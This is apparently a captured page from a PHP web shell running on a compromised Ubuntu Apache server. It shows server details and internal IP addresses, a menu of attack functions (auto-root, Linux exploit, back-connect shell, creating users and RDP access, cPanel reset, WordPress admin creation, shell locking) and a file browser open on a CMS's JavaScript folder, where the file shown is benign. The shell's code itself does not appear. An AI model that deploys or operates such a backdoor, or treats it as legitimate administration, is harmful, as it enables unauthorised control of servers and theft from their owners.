Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
static /
cms /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
polyfills
[ DIR ]
drwxr-xr-x
select2
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
admin.base.js
406
B
-rw-r--r--
admin.changeform.js
323
B
-rw-r--r--
admin.pagetree.js
164
B
-rw-r--r--
toolbar.js
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : toolbar.js
// polyfills import './polyfills/function.prototype.bind'; import './polyfills/domparser'; import initHelpShortcuts from './modules/shortcuts'; // jquery plugins import './libs/pep'; import './modules/dropdown'; // CMS Core import { Helpers, KEYS } from './modules/cms.base'; import $ from 'jquery'; import Class from 'classjs'; // exposing globals for backwards compatibility import Messages from './modules/cms.messages'; import ChangeTracker from './modules/cms.changetracker'; import Modal from './modules/cms.modal'; import Sideframe from './modules/cms.sideframe'; import Clipboard from './modules/cms.clipboard'; import Plugin from './modules/cms.plugins'; import StructureBoard from './modules/cms.structureboard'; import Toolbar from './modules/cms.toolbar'; import Tooltip from './modules/cms.tooltip'; // CMS by this time should be a global that has `_plugins` property const CMS = window.CMS || {}; CMS._plugins = CMS._plugins || []; CMS.Messages = Messages; CMS.ChangeTracker = ChangeTracker; CMS.Modal = Modal; CMS.Sideframe = Sideframe; CMS.Clipboard = Clipboard; CMS.Plugin = Plugin; CMS.StructureBoard = StructureBoard; CMS.Toolbar = Toolbar; CMS.Tooltip = Tooltip; CMS.API = { Helpers }; CMS.KEYS = KEYS; CMS.$ = $; CMS.Class = Class; initHelpShortcuts(); window.CMS = CMS;
Close